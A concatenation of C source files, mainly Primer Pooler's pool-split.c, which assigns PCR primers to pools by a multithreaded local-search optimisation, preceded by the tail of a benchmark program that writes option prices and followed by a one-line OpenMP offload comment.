printf("ERROR: Unable to write to file %s.\n", outputFile);
fclose(file);
return 1;
}
for (i = 0; i < numOptions; i++) {
rv = fprintf(file, "%.18f\n", prices[i]);
if (rv < 0) {
printf("ERROR: Unable to write to file %s.\n", outputFile);
fclose(file);
return 1;
}
}
rv = fclose(file);
if (rv != 0) {
printf("ERROR: Unable to close file %s.\n", outputFile);
return 1;
}
#ifdef ERR_CHK
printf("Num Errors: %d\n", numError);
#endif
free(data);
free(prices);
#ifdef ENABLE_PARSEC_HOOKS
__parsec_bench_end();
#endif
return 1;
}
|
pool-split.c | /*
This file is part of Primer Pooler (c) Silas S. Brown. For Wen.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <limits.h>
#include <time.h>
#include <signal.h>
#define NDEBUG
#include <assert.h>
#include "openmp.h"
#include "all-primers.h"
#include "triangle.h"
#include "numbers.h"
#include "memcheck.h"
#define USE_QSORT 0 /* set this to 1 if you want to qsort the moves and pick either the best or next-best at random; 0 (faster) to take only the best move. (TODO: user configurable?) */
#define PARALLELIZE_POOLSPLIT 1 /* having this at 1 can help find solutions more quickly (starts with a different initial randomization on each core)... */
#define PARALLELIZE_BESTMOVE 0 /* ...but setting this to 1 can make things SLOWER :-( unless dealing with a HUGE number of primer PAIRS (say, >2000 primers for >1000 pairs), otherwise the loop is too small for the parallelisation speedup to outweigh the thread-setup overhead */
/* Proposed move N = move primer N/(nPools-1) into pool currentPool + 1 + (N % (nPools-1)) (mod nPools).
(Therefore every move MOVES something; no 'no-op's, since 1+(m mod (range-1)) cannot express going back to start)
Immediate value = badnessContrib(cur) - badnessC(dest)
We could save some division in qsort's inner loop by
maintaing a separate array, but would need to profile
as might be outweighed by worse locality of reference.
These variables need to be available at module scope so
that our qsort comparison function can get at them:
*/
#if USE_QSORT
static int *qsort_pools, qsort_nPools,
*qsort_poolCounts, qsort_maxCount;
static ULL *qsort_bContrib;
/* otherwise we WON'T have them global, and we can be more
multi-threaded w/out having to stall every time we call
qsort (unless hard-code a pool of comparison funcs).
The qsort version is slower ANYWAY and off by default,
so I'm not too worried about having to stall for it. */
#endif
/* badness as ULL:
bits 63-48: unsigned short maxScore (or invalid)
bits 47-32: unsigned short num with this score
bits 31-16: unsigned short num with this score - 1
bits 15-0: unsigned short num with this score - 2
Note: bit 63 is always 0, so it's safe to cast to LL
and do a subtraction to compare which is better of two
states for qsort. But 'value of move' is NOT equal to
the DISTANCE between two of these; use valueOfReduction
*/
typedef unsigned short US;
enum { InvalidCombination=0x4000 }; /* (also mentioned in 64.h etc) If score is real score, 129 should do if no primers can be that long in this program. But we'll need it higher if score is really -dG*10 (it's -dG*2 at the moment). Don't approach 0x8000 though, + allow room for possible overflow of next field (so no 0x7FFF), although subtractBadness / valueOfReduction might need attention if we actually come to expect overflows between fields */
static inline int maxScoreOfBadness(ULL badness) {
return (int)(badness>>48);
}
static inline void updateBadness(ULL *badness,int score) {
int max = maxScoreOfBadness(*badness);
assert(max <= InvalidCombination); assert(score <= InvalidCombination);
if (score > max) {
if (score > max+2) {
*badness = ((ULL)score << 48) | ((ULL)1 << 32);
return;
} else while(score > max) { /* (TODO: could just write out the 2 cases of this loop, and change the below shifts into AND and add, IF profiling shows this needs it) */
*badness = ((*badness >> 16) & 0xFFFFFFFFLL) | ((((*badness)>>48)+1)<<48); max++;
}
} /* now score <= max */
int lswScore = max - 2;
if(score < lswScore) return; /* this score is too insignificant to count at the current maximum level */
int sL = (score-lswScore)*16;
if(((*badness>>sL)&0xFFFF)==0xFFFF) return; /* saturated */
*badness += ((ULL)1 << sL);
assert(maxScoreOfBadness(*badness) == max);
}
static inline int subtractBadness(ULL *badness,int score) {
/* for incremental updates. Assume score has previously
been included in updateBadness, so we don't have to
worry about crossing 0 here. */
int max = maxScoreOfBadness(*badness);
assert(score <= max);
int lswScore = max - 2;
if(score < lswScore) return 0; /* this score is too insignificant to affect the counters */
int sL = (score-lswScore)*16;
if(((*badness>>sL)&0xFFFF)==0xFFFF) return 0; /* if it was saturated, we'll have to leave it "stuck" there I'm afraid (unless return 1 to recalculate, but in many cases it would just saturate again) */
*badness -= ((ULL)1 << sL);
return !((*badness>>32)&0xFFFF); /* recalc max if count(max)==0 */
}
static inline ULL valueOfReduction(ULL from,ULL to) {
/* for qsort etc. We COULD return negative values as
LL, but that would be more computation and we might
as well just return 0, since we won't perform any
value-based moves that don't have positive reductions
*/
if(to > from) return 0;
if(!to) return from;
if(maxScoreOfBadness(from) == maxScoreOfBadness(to)) {
/* 'from-to' will be a 48-bit value, and if get here
then the high 16 bits of 'to' will be <= 'from',
but if the mid 16 bits are >= then we need to set
all of the low 32 bits to 0, and if the bottom
16 bits are >= then we need to set low 16 to 0. */
ULL hi = (from & ((ULL)0xFFFF<<32)) - (to & ((ULL)0xFFFF<<32)), /* do NOT factor out the & part! */
mid1 = from & ((ULL)0xFFFF<<16),
mid2 = to & ((ULL)0xFFFF<<16);
if (mid2 > mid1) return hi;
ULL lo1 = from & 0xFFFF, lo2 = to & 0xFFFF;
if (lo2 > lo1) return hi | (mid1-mid2);
return from-to;
}
/* maxScoreOfBadness(from) > maxScoreOfBadness(to) :
at the very least we need to 0-out the bottom 48 bits
(TODO: we might be able to add some back in if
maxScoreOfBadness(from) <= maxScoreOfBadness(to)+2,
but probably OK just to do this for now...)
*/ return (from & ((ULL)0xFFFF<<48)) - (to & ((ULL)0xFFFF<<48));
}
static inline int primerOfMove(int m,int nPools) {
return m/(nPools-1); }
static inline int oldPoolOfMove(int m,int nPools,const int* pools) {
return pools[primerOfMove(m,nPools)]; }
static inline int poolOfMove(int m,int nPools,const int* pools) { return (oldPoolOfMove(m,nPools,pools)+1+(m % (nPools-1))) % nPools; }
static inline int primerAndDest_to_moveNo(int primer,int newPool,int nPools,const int *pools) {
// works only if newPool != current pool
return ((newPool+nPools-pools[primer]-1) % nPools) + primer*(nPools-1);
}
static inline int primerAndPool_to_contribOffset(int primer,int pool,int nPools) {
return primer * nPools + pool; }
static inline int move_to_contribOffset(int m,int nPools,const int* pools) {
return primerAndPool_to_contribOffset(primerOfMove(m,nPools),poolOfMove(m,nPools,pools),nPools); }
static inline ULL valueOfMove(int m,int nPools,const int* pools,const ULL*bContrib,const int *poolCounts,int maxCount) {
if(maxCount && poolCounts[poolOfMove(m,nPools,pools)]==maxCount) return 0;
assert(!maxCount || poolCounts[poolOfMove(m,nPools,pools)]<maxCount);
ULL from = bContrib[primerAndPool_to_contribOffset(primerOfMove(m,nPools),oldPoolOfMove(m,nPools,pools),nPools)], /* what this primer was contributing to its old pool */
to = bContrib[move_to_contribOffset(m,nPools,pools)]; /* what this primer will contribute to its new pool */
assert(!to || poolCounts[poolOfMove(m,nPools,pools)]);
return valueOfReduction(from,to);
}
#if USE_QSORT
static int betterMoves1st(const void *aP, const void *bP){
int a = *(int*)aP, b = *(int*)bP;
ULL vA = valueOfMove(a,qsort_nPools,qsort_pools,qsort_bContrib,qsort_poolCounts,qsort_maxCount), vB = valueOfMove(b,qsort_nPools,qsort_pools,qsort_bContrib,qsort_poolCounts,qsort_maxCount);
/* Can't just subtract as it'll overflow an int */
if (vA > vB) return -1; /* A is better, put first */
else if (vA == vB) return 0;
else return 1;
}
#else
static int findBestMove(const int *moves,int numMoves,int nPools,const int* pools,const ULL*bContrib,const int*poolCounts,int maxCount) {
int bestMove = moves[0];
ULL bestVal = valueOfMove(bestMove,nPools,pools,bContrib,poolCounts,maxCount);
#if PARALLELIZE_BESTMOVE && defined(_OPENMP)
#pragma omp parallel
#endif
{
int priv_bestMove = bestMove;
ULL priv_bestVal = bestVal;
int i;
#if PARALLELIZE_BESTMOVE && defined(_OPENMP)
#pragma omp for schedule(static)
#endif
for(i=1; i<numMoves; i++) {
ULL thisVal = valueOfMove(moves[i],nPools,pools,bContrib,poolCounts,maxCount);
if(thisVal > priv_bestVal) {
priv_bestVal = thisVal;
priv_bestMove = moves[i];
}
}
if(priv_bestVal > bestVal) {
#if PARALLELIZE_BESTMOVE && defined(_OPENMP)
#pragma omp critical
#endif
if (priv_bestVal > bestVal) {
bestVal = priv_bestVal;
bestMove = priv_bestMove;
}
}
} return bestMove;
}
#endif
/* and here is code to set up & maintain that bContrib: */
static void badnessContrib(int primer,const int *scores,int np,int nPools,const int *pools,ULL *bContrib) {
/* Assuming proposedPools[0:nPools] == 0 on entry, set proposedPools[0:nPools] to answer the Q: What contribution to the overall "badness" would primer make, assuming it were moved to (or left as-is in) proposedPools[n] and no other changes were made? */
assert(primer>=0 && primer<np);
ULL *proposedPools = bContrib + primer*nPools;
int i;
for(i=0; i<primer; i++) { /* ( <primer , primer ) */
int pool = pools[i]; assert(pool>=0 && pool<nPools);
updateBadness(proposedPools+pool,scores[primer-i]); /* if we put 'primer' in the same pool as 'i' is, we'll get the badness of the interaction between i and primer */
scores += (np-i);
}
++scores; /* i==primer, ignore interaction w. itself */
for(++i; i<np; i++,scores++) { /* ( primer, >primer ) */
int pool = pools[i]; assert(pool>=0 && pool<nPools);
updateBadness(proposedPools+pool,*scores);
}
}
static void badnessContribUpdate(int primer,const int *scores,int np,int otherPrimer,int otherOldPool,int nPools,const int *pools,ULL *bContrib,const int *poolCounts) {
/* as above but just incrementally update primer's proposedPools in light of the fact that otherPrimer has just moved from otherOldPool to its current pool */
assert(primer>=0 && primer<np && otherPrimer>=0 && otherPrimer<np && otherOldPool>=0 && otherOldPool<nPools);
ULL *proposedPools = bContrib + primer*nPools;
int s, otherNewPool = pools[otherPrimer];
assert(otherNewPool>=0 && otherNewPool<nPools);
if(otherPrimer == primer) return;
s = scores[t_offset(np,primer,otherPrimer)]; /* the score-contribution of interaction between primer and otherPrimer */
if(!poolCounts[otherOldPool])
proposedPools[otherOldPool] = 0; /* like the loop below but also clears any saturation (since we know there won't be saturation if the pool was left empty) */
else if(subtractBadness(proposedPools+otherOldPool,s)) {
/* oops, need to recalc the max of otherOldPool */
proposedPools[otherOldPool] = 0;
int i;
for(i=0; i<primer; i++) { /* ( <primer , primer ) */
if(pools[i] == otherOldPool)
updateBadness(proposedPools+otherOldPool,scores[primer-i]);
scores += (np-i);
}
++scores;
for(++i; i<np; i++,scores++) {
if(pools[i]==otherOldPool)
updateBadness(proposedPools+otherOldPool,*scores);
}
}
updateBadness(proposedPools+otherNewPool,s);
}
static ULL globalBadness(const int *score,int np,const int *pools) {
/* Measure across all primers in all pools. We might
perhaps be able to optimise this by making use of
what we've already calculated in bContrib, but this
function is called only when we get to local maxima.
*/
int i,j; ULL m=0;
for(i=0; i<np; i++) for(j=i; j<np; j++) if(pools[i]==pools[j]) updateBadness(&m,*score++); else score++;
return m;
}
static inline void make_a_move(int m,int np,const int *scores,const int *primerMove_depends_on,int nPools,int *pools,ULL *bContrib,int *poolCounts,int maxCount) {
int primer = primerOfMove(m,nPools),
oldPool = oldPoolOfMove(m,nPools,pools),
newPool = poolOfMove(m,nPools,pools);
assert(primer >= 0 && primer < np && oldPool>=0 && newPool>=0 && oldPool<nPools && newPool<nPools && oldPool != newPool);
pools[primer] = newPool; /* 'm' changes meaning now */
assert(poolCounts[oldPool]);
poolCounts[oldPool]--; poolCounts[newPool]++;
assert(!maxCount || poolCounts[newPool]<=maxCount);
int i; for(i=0; i<np; i++) {
if(primerMove_depends_on[i]==primer)
pools[i] = newPool; /* see merge_scores_of_stuckTogether_primers (and DON'T need to update poolCounts here) */
else badnessContribUpdate(i,scores,np,primer,oldPool,nPools,pools,bContrib,poolCounts);
}
}
static inline int should_stick_together(AllPrimers ap,int i,int j) {
/* Names same except last letter = keep in same pool */
const char *n1=ap.names[i], *n2=ap.names[j];
size_t l1=strlen(n1),l2=strlen(n2);
return (l1 == l2 && !strncmp(n1,n2,l1-1)); /* TODO: case-insensitive? */
}
static inline void updateMax(int *i,int m) {
if(m>*i) *i=m;
}
static int* merge_scores_of_stuckTogether_primers(AllPrimers ap,int *scores) {
int i,j,*p=scores; if(!p) return NULL;
int *primerMove_depends_on=malloc(ap.np*sizeof(int));
if(!primerMove_depends_on) return NULL;
memset(primerMove_depends_on,0xFF,ap.np*sizeof(int));
char *pairedOK=malloc(ap.np);
if(!pairedOK) {
free(primerMove_depends_on); return NULL;
}
memset(pairedOK,0,ap.np);
int doneMerge = 0;
for(i=0; i<ap.np; i++) for(j=i; j<ap.np; j++) {
if(i!=j && primerMove_depends_on[i]==-1 && primerMove_depends_on[j]==-1 && should_stick_together(ap,i,j)) {
/* For simplicity of pooling, we'll set it so:
- Interactions with i get maxed with those w.j
- Interactions with j itself "don't count"
- j is not allowed to be moved by itself
- j is always moved when i moves */
*p = 0; /* so S(i,j) = 0 */
int k,*kp=scores; /* max S(k,i) with S(k,j): */
int *Sip=0; /* =0 to suppress compiler warning */
for(k=0; k<j; k++) {
if(k<i) {
updateMax(kp+i-k,kp[j-k]); kp[j-k]=0;
} else if(k==i) {
Sip = kp+1; /* needed for S(i,k) */
} else { /* max S(i,k) with S(k,j) */
updateMax(Sip++,kp[j-k]); kp[j-k]=0;
}
kp += (ap.np-k);
} k++; kp++; Sip++; /* ignore k==j */
for(;k<ap.np;k++) {
/* max S(i,k) [=Sip] with S(j,k) [=kp] */
updateMax(Sip++,*kp); *kp++=0;
}
primerMove_depends_on[j] = i;
doneMerge = pairedOK[i] = pairedOK[j] = 1;
}
p++;
}
if(doneMerge) {
/* just check for lone primers, usually a bad sign */
for(i=0; i<ap.np; i++) if(!pairedOK[i]) fprintf(stderr,"Warning: ungrouped primer %s\n",ap.names[i]);
} else {
/* same message as in amplicons.c (see comment there)
in case overlap-check was missed */
fputs("WARNING: No primers are paired!\nPlease end your forward primers with -F\nand your reverse primers with -R or -B as instructed\n",stderr);
}
free(pairedOK); return primerMove_depends_on;
}
static inline int should_stick_to_pool(AllPrimers ap,int i) {
/* if the user wants some primers to be fixed to
specific pools (and we move the rest around) */
const char *n=ap.names[i];
if(*n == '@' && *(++n)>='0' && *n<='9') {
char *end; int pool=(int)strtol(n,&end,10);
if(*end==':') {
/* we have a valid @<pool number>: */
return pool-1; /* (internally start at 0) */
}
}
return -1;
}
static int* pre_fix_primers_to_pools(AllPrimers ap) {
int *fix_to_pool=malloc(ap.np*sizeof(int)), i;
if(!fix_to_pool) return NULL;
for(i=0; i<ap.np; i++)
fix_to_pool[i] = should_stick_to_pool(ap,i);
return fix_to_pool;
}
static void saturate_scores_of_overlapping_primers(int *scores,const char *overlappingAmplicons,const int *primerNoToAmpliconNo,int nAmplicons,int np) {
int i,j,*p=scores; if(!p || !nAmplicons) return;
assert(overlappingAmplicons);
for(i=0; i<np; i++) for(j=i; j<np; j++) {
assert(*p<InvalidCombination);
if(i!=j && primerNoToAmpliconNo[i]!=-1 && primerNoToAmpliconNo[j]!=-1 && overlappingAmplicons[primerNoToAmpliconNo[i]*nAmplicons+primerNoToAmpliconNo[j]])
*p = InvalidCombination;
p++;
}
}
static void printNumInEachPool(const int *poolCounts,int numPools) {
fprintf(stderr,"\tPool sizes: "); int i;
for(i=0; i<numPools; i++) {
if(i) fprintf(stderr,"|");
fprintf(stderr,"%d",poolCounts[i] << 1); /* TODO: this "<< 1" assumes countOf(primerMove_depends_on==-1) == np/2, but that is almost certainly going to be the case, unless somebody is doing something very strange, and if the worst comes to the worst it's only an informational pool-size display going a bit wrong */
} fprintf(stderr,"\n");
}
static int IntCompare(const void *a,const void *b) {
return *(const int*)b-*(const int*)a;
}
static int* numInEachPool(const int *pools,int np,int numPools,const int *primerMove_depends_on) {
/* for after everything has finished and the per-thread poolCounts has been freed */
int* counts=calloc(numPools,sizeof(int));
if(!counts) return NULL;
int i; for(i=0; i<np; i++)
if(primerMove_depends_on[i]==-1)
counts[pools[i]]++;
qsort(counts,numPools,sizeof(int),IntCompare);
return counts;
}
enum { s_KeepGoing = 0, s_ccPressed, s_tooManyIters };
static volatile int stop_state;
static void intHandler(int s) { stop_state = s_ccPressed; }
static void randomise_pools(int np,const int *primerMove_depends_on,const int *fix_to_pool,const int *scores,int nPools,int *pools,ULL *bContrib,int *poolCounts,int maxCount) {
/* initialise to random distribution of pools, but note
primerMove_depends_on and maxCount when doing this.
Also initialise bContrib. */
int i; memset(poolCounts,0,nPools*sizeof(int));
/* First set all fixed-pool primers in place,
before randomising the others around them */
for(i=0; i<np; i++)
if(primerMove_depends_on[i] == -1) {
int pool = fix_to_pool[i];
if(pool != -1) {
if(maxCount && poolCounts[pool]==maxCount && !(maxCount==1 && nPools==np)) {
/* (last part of that condition detects call by suggest_num_pools,
where it's OK if fixed-pool primers make us exceed 1 per pool) */
fprintf(stderr, "randomise_pools ERROR: maxCount too small for fixed primer in pool %d\n",fix_to_pool[i]);
abort();
} pools[i]=pool; poolCounts[pool]++;
}
}
for(i=0; i<np; i++)
if(primerMove_depends_on[i] == -1 && fix_to_pool[i] == -1) {
int pool = ThreadRand() % nPools;
int origPool = pool;
while(maxCount && poolCounts[pool]>=maxCount) {
pool++; /* not very random but it'll do for now */
if(pool==nPools) pool=0;
if(pool==origPool) {
fprintf(stderr, "randomise_pools ERROR: maxCount too small, can't fit\n");
abort();
}
} pools[i]=pool; poolCounts[pool]++;
}
for(i=0; i<np; i++)
if(primerMove_depends_on[i]>-1)
/* DON'T update poolCounts here (it's in pairs so moveTooLopsided doesn't have to account for this one) */
pools[i]=pools[primerMove_depends_on[i]];
memset(bContrib,0,np*nPools*sizeof(ULL));
for(i=0; i<np; i++) badnessContrib(i,scores,np,nPools,pools,bContrib);
}
static int* initMoves(int *numMoves,int np,int nPools,const int *primerMove_depends_on,const int *fix_to_pool) {
if(nPools <= 1) return NULL;
int *moves=malloc(np*(nPools-1)*sizeof(int));
if(moves) {
int *movesP = moves, i;
for(i=0; i<np*(nPools-1); i++) {
int primer = primerOfMove(i,nPools);
if(primerMove_depends_on[primer]==-1
&& fix_to_pool[primer]==-1) *movesP++ = i;
}
*numMoves = movesP-moves;
moves = memTrim(moves,movesP);
} return moves;
}
#if Has_128bit
typedef bit128 ThreadMask;
#else
typedef ULL ThreadMask;
#endif
static void poolsplit_thread(const int* shared_moves,AllPrimers ap,int nPools,int numMoves,const int* primerMove_depends_on,const int* fix_to_pool,const int* scores,time_t limitTime,int *bestPools,const float* table, int* bestPools_init_yet,ULL* gBadLast,long *totalIterations,time_t *lastOutputTime,int *overlaps,int* just_printed_counts,ThreadMask* threads_needing_to_reset_iter,int maxCount) {
/* This is the inner part of split_into_pools.
Multiple instances may be called in parallel. */
int iter = 0, willContinue=1;
int *moves = (int*)shared_moves;
ULL *bContrib = malloc(ap.np*nPools*sizeof(ULL));
int *poolCounts=malloc(nPools*sizeof(int));
int *pools = NULL;
if(memFail(bContrib,poolCounts,_memFail))
willContinue = 0;
else {
pools = malloc(ap.np*sizeof(int));
if(memFail(pools,_memFail)) willContinue = 0;
else if(USE_QSORT) { /* moves must be per-thread */
moves=malloc(numMoves*sizeof(int));
if(memFail(moves,_memFail)) willContinue = 0;
else wrapped_memcpy(moves,shared_moves,numMoves*sizeof(int));
}
}
ThreadMask myMask = ((ThreadMask)1) << omp_get_thread_num(); /* for threads_needing_to_reset_iter */
if (!myMask) {
/* what, somebody's running us on >128 cores ?? (or >64 32-bit cores) */
/* (versions below v1.16 would hit this after 32 cores and not detect it) */
#if defined(_OPENMP)
#pragma omp critical
#endif
fprintf(stderr,"Can't run thread number %d because ThreadMask type has only %d bits\n",omp_get_thread_num(),(int)sizeof(ThreadMask)*8); /* If you hit this, I suggest you either find a wider ThreadMask type or else we'd better make it an array. Haven't done it so far because I've tested only on a 4-core machine and I doubt the chances of being run on many more cores than that are particularly high in 2016 (future might be different) */
willContinue = 0;
}
int max_iterations = 10000000 /* TODO: customise? profile? (but low priority as we have an interrupt mechanism) */
/ (omp_get_num_threads() > 10 ? 10 : omp_get_num_threads()); /* TODO: customise this "10" as well? (it's maxMoves / minMoves) */
while(willContinue) {
randomise_pools(ap.np,primerMove_depends_on,fix_to_pool,scores,nPools,pools,bContrib,poolCounts,maxCount);
for(; ; iter++) {
#if USE_QSORT
#if PARALLELIZE_POOLSPLIT && defined(_OPENMP)
#pragma omp critical
#endif
{
qsort_pools = pools; qsort_nPools = nPools;
qsort_bContrib = bContrib;
qsort_poolCounts = poolCounts;
qsort_maxCount = maxCount;
qsort(moves,numMoves,sizeof(int),betterMoves1st);
}
int bestMove = moves[0];
#else
int bestMove = findBestMove(moves,numMoves,nPools,pools,bContrib,poolCounts,maxCount);
#endif
if(*threads_needing_to_reset_iter & myMask) {
#if PARALLELIZE_POOLSPLIT && defined(_OPENMP)
#pragma omp critical
#endif
{
*threads_needing_to_reset_iter &= ~myMask;
*totalIterations += iter;
} iter = 0;
}
int timesUp = stop_state || (limitTime && time(NULL) >= limitTime);
if(timesUp || !valueOfMove(bestMove,nPools,pools,bContrib,poolCounts,maxCount)) {
/* looks like we're at a local maxima */
willContinue = !timesUp;
ULL gBad = globalBadness(scores,ap.np,pools);
int keep = !*bestPools_init_yet || gBad < *gBadLast;
if (keep)
#if defined(_OPENMP)
#pragma omp critical
#endif
if ((keep = !*bestPools_init_yet || gBad < *gBadLast) != 0) {
*bestPools_init_yet = 1;
wrapped_memcpy(bestPools,pools,ap.np*sizeof(int));
*gBadLast = gBad; *totalIterations += iter;
}
if(gBad < (ULL)1<<48) willContinue=0; // everything down to score 0 - can't very much improve on that (except for reducing # pools or size difference)
if (keep) {
iter = 0;
if(time(NULL)-*lastOutputTime > 2) {
int should_print_counts = 0;
#if PARALLELIZE_POOLSPLIT && defined(_OPENMP)
#pragma omp critical
#endif
if(time(NULL)-*lastOutputTime > 2) {
*lastOutputTime = time(NULL);
*threads_needing_to_reset_iter = ~0;
should_print_counts = 1;
} if(should_print_counts) {
*overlaps=table?dGprintPooledCounts(ap,pools,scores,stderr) : printPooledCounts(ap,pools,scores);
printNumInEachPool(poolCounts,nPools);
if(!willContinue) {
*just_printed_counts = 1; break; }
fprintf(stderr,"Local maxima found after %" QUOT "ld moves\nTrying to better it... (press Control-C to stop)\n",*totalIterations+iter); /* TODO: what about the 'iter' values of other threads? (or just don't count them yet) */
fflush(stderr); /* in case of broken Windows/WINE etc (see comments in user.c) */
}
}
} else {
/* this maxima doesn't beat the best we've seen */
if(iter>max_iterations && !stop_state) {
fputs("Too many moves without improvement: giving up\n",stderr);
willContinue=0; /* and stop other threads: */
stop_state = s_tooManyIters;
}
}
if(!willContinue) break;
if(keep) {
/* already found a good local maxima, so just take a few random steps away from it... */
int randomMoves = 5+ThreadRand()%5, i;
for(i=0; i<randomMoves; i++) {
int moveToMake=ThreadRand()%numMoves;
if(maxCount) while(poolCounts[poolOfMove(moves[moveToMake],nPools,pools)]==maxCount) if(++moveToMake==numMoves) moveToMake=0;
make_a_move(moves[moveToMake],ap.np,scores,primerMove_depends_on,nPools,pools,bContrib,poolCounts,maxCount);
} continue; /* don't do the additional make_a_move below (we'd have to repeat the maxCount condition) */
} else {
/* local maximae getting worse...
get me out of here! */
break;
}
}
#if USE_QSORT
int i = 0;
while(!(ThreadRand()%5) && i<numMoves-1 && valueOfMove(moves[i+1],nPools,pools,bContrib,poolCounts,maxCount)) ++i; /* sometimes don't pick the best one, just in case (TODO: can we write code to "get the top N items" w/out a complete sort?) */
bestMove = moves[i];
#endif
make_a_move(bestMove,ap.np,scores,primerMove_depends_on,nPools,pools,bContrib,poolCounts,maxCount);
}
}
if(bContrib) free(bContrib);
if(pools) free(pools);
free(poolCounts);
#if PARALLELIZE_POOLSPLIT && defined(_OPENMP)
#pragma omp critical
#endif
*totalIterations += iter;
}
PS_cache PS_precalc(AllPrimers ap,const float *table,const char *overlappingAmplicons,const int *primerNoToAmpliconNo,int nAmplicons) {
PS_cache r;
addTags(ap);
r.scores = table ? dGtriangle(ap,table) : triangle(ap);
removeTags(ap);
r.primerMove_depends_on = merge_scores_of_stuckTogether_primers(ap,r.scores);
r.fix_to_pool = pre_fix_primers_to_pools(ap);
if(memFail(r.scores,r.primerMove_depends_on,r.fix_to_pool,_memFail)) r.scores = NULL;
else {
saturate_scores_of_overlapping_primers(r.scores,overlappingAmplicons,primerNoToAmpliconNo,nAmplicons,ap.np);
r.fix_min_pools = 2;
int i; for(i=0; i<ap.np; i++) if(r.fix_to_pool[i]>=r.fix_min_pools) r.fix_min_pools=r.fix_to_pool[i]+1;
}
return r;
}
void PS_free(PS_cache c) {
if(c.scores) {
free(c.scores);
free(c.primerMove_depends_on);
free(c.fix_to_pool);
}
}
int* split_into_pools(AllPrimers ap,int nPools,int timeLimit,PS_cache cache,int seedless,const float *table,int maxCount) {
int *scores = cache.scores; if(!scores) return NULL;
int *primerMove_depends_on = cache.primerMove_depends_on;
int *fix_to_pool = cache.fix_to_pool;
{
if(nPools<cache.fix_min_pools) { fprintf(stderr,"ERROR: @%d:primers need at least %d pools, but only got %d\n",cache.fix_min_pools,cache.fix_min_pools,nPools); return NULL; }
}
if(maxCount) { int denom=0,i; for(i=0; i<ap.np; i++) if(primerMove_depends_on[i]!=-1) denom++; maxCount=maxCount*denom/ap.np; if(!maxCount) maxCount=1; } /* pairs */
int numMoves=0,*shared_moves=initMoves(&numMoves,ap.np,nPools,primerMove_depends_on,fix_to_pool); /* =0 to stop warnings on old compilers */
if(memFail(shared_moves,_memFail)) return NULL;
if(!numMoves) {
fputs("Can't move anything!\n",stderr);
free(shared_moves); return NULL;
}
int *bestPools = malloc(ap.np*sizeof(int));
if(memFail(shared_moves,bestPools,_memFail)) return NULL;
time_t start = time(NULL);
srand(seedless ? 1 : start);
int bestPools_init_yet = 0; ULL gBadLast=0; /* latter =0 to stop warnings on old compilers */
time_t lastOutputTime = (time_t)0; /* so 1st maxima gets output no matter what (might be needed if break after) */
time_t limitTime = (time_t)0; if(timeLimit) limitTime = time(NULL) + timeLimit*60; /* (timeLimit is in minutes) */
int just_printed_counts = 0, overlaps = 0;
stop_state = s_KeepGoing; signal(SIGINT, intHandler);
if(omp_get_max_threads() > 1) {
if(seedless) { omp_set_num_threads(1); fputs("NOT parallelising the pool trials, as you asked for predictability.\n",stderr); }
else fprintf(stderr,"Parallelising pool trials: %d threads\n",omp_get_max_threads());
}
fprintf(stderr,"OK, here goes... (press Control-C to stop%s)\n",timeLimit?" early":""); fflush(stderr);
long totalIterations = 0;
ThreadMask threads_needing_to_reset_iter = 0;
#if PARALLELIZE_POOLSPLIT && defined(_OPENMP)
#pragma omp parallel
#endif
poolsplit_thread(shared_moves,ap,nPools,numMoves,primerMove_depends_on,fix_to_pool,scores,limitTime,bestPools,table, &bestPools_init_yet,&gBadLast,&totalIterations,&lastOutputTime,&overlaps,&just_printed_counts,&threads_needing_to_reset_iter,maxCount);
signal(SIGINT, SIG_DFL);
if(!just_printed_counts) {
fputs("... looks like this is the best I can do:\n",stderr);
overlaps = table ? dGprintPooledCounts(ap,bestPools,scores,stderr) : printPooledCounts(ap,bestPools,scores);
int *counts=numInEachPool(bestPools,ap.np,nPools,primerMove_depends_on);
if(counts) {
printNumInEachPool(counts,nPools);
free(counts);
}
}
long numSecs = (long)(time(NULL)-start);
if(!numSecs) numSecs=1; /* so division doesn't crash */
fprintf(stderr,"%" QUOT "ld moves",totalIterations);
prnSeconds(numSecs); fprintf(stderr," = %" QUOT "ld/sec\n",totalIterations/numSecs);
if(bestPools && overlaps) {
if(stop_state == s_tooManyIters) fprintf(stderr,"WARNING: There are still overlaps in these pools,\neven after this number of moves.\nYou might need more pools.\n");
else fprintf(stderr,"WARNING: There are still overlaps in these pools.\nMaybe you should have let it run longer\nto see if these overlaps can be eliminated.\n");
} fflush(stderr);
free(shared_moves); return bestPools;
}
int suggest_num_pools(AllPrimers ap,PS_cache cache,const float *table) {
/* Apply a simple threshold-based allocation just for
suggesting a number of pools */
int threshold = table ? 14 : 7; /* dG -7 or score 7. TODO: customise? but this function is for when the user is not sure, so perhaps we'd best hard-code the threshold */
int nPools = ap.np; /* worst case is none of the primers are paired (unpaired primers could hang randomise_pools before v1.42 because this line said ap.np/2) */
int *scores = cache.scores; if(!scores) return 0;
int *primerMove_depends_on = cache.primerMove_depends_on;
int *fix_to_pool = cache.fix_to_pool;
ULL *bContrib = malloc(ap.np*nPools*sizeof(ULL));
int *poolCounts=malloc(nPools*sizeof(int));
int *pools = malloc(ap.np*sizeof(int));
if(memFail(bContrib,poolCounts,pools,_memFail))
return 0;
randomise_pools(ap.np,primerMove_depends_on,fix_to_pool,scores,nPools,pools,bContrib,poolCounts,1); /* puts 0 or 1 set in each pool (after the fixed ones) */
int suggest_nPools = 1;
int primer; for (primer=0; primer<ap.np; primer++) if (primerMove_depends_on[primer]==-1) {
if (fix_to_pool[primer]==-1) {
int destPool; for (destPool=0; destPool < suggest_nPools; destPool++) if(maxScoreOfBadness(bContrib[primerAndPool_to_contribOffset(primer,destPool,nPools)]) <= threshold) break; /* find first pool it will 'fit' in */
if (destPool == suggest_nPools) suggest_nPools++;
if (pools[primer] != destPool) make_a_move(primerAndDest_to_moveNo(primer,destPool,nPools,pools),ap.np,scores,primerMove_depends_on,nPools,pools,bContrib,poolCounts,ap.np);
} else if (fix_to_pool[primer] >= suggest_nPools) {
/* must have at least as many for the fixed-pool primers
(and fix_to_pool starts numbering at 0, so +1 of course) */
suggest_nPools = fix_to_pool[primer] + 1;
}
}
free(bContrib); free(pools); free(poolCounts);
return suggest_nPools;
}
|
example.c | // PWR026: Annotate function for OpenMP offload
